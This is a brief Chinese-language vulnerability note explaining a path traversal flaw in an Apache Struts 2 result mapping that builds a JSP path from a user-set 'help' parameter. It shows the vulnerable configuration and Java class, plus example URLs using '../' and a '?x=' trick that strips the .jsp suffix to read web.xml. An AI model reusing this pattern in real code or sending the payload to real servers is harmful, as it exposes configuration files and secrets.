该错误可以导致他人任意访问该路径下的任何文件。
struts 文件
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE struts PUBLIC "-//Apache Software Foundation//DTD Struts Configuration 2.0//EN" "http://struts.apache.org/dtds/struts-2.0.dtd"> <struts> <package name="help" extends="common"> <action name="help" class="com.web.help.HelpAction"> <result name="success">/WEB-INF/jsp/common/${help}.jsp</result> </action> </package> </struts>
其中help 为 action 属性,
public class HelpAction { private String help; /** * 用户添加反馈意见 * @return */ public String addUserOpinion(){return SUCCESS; } }
导致用户变换help 的值即可访问/WEB-INF/jsp/common/的所用文件。
通过"../"向上跨目录读取 WEB-INF 下所有配置文件内容。
如链接访问 /help/help!addUserOpinion?help=aa 即可访问该路径下的aa.jsp文件
或者/help/help!addUserOpinion?help=../../web.xml?x= 即可访问web.xml文件(?x=的作用是使链接成为 web.xml?x=.jsp,就可以访问web.xml了,不加的话就成了
web.xml.jsp了,就报404了)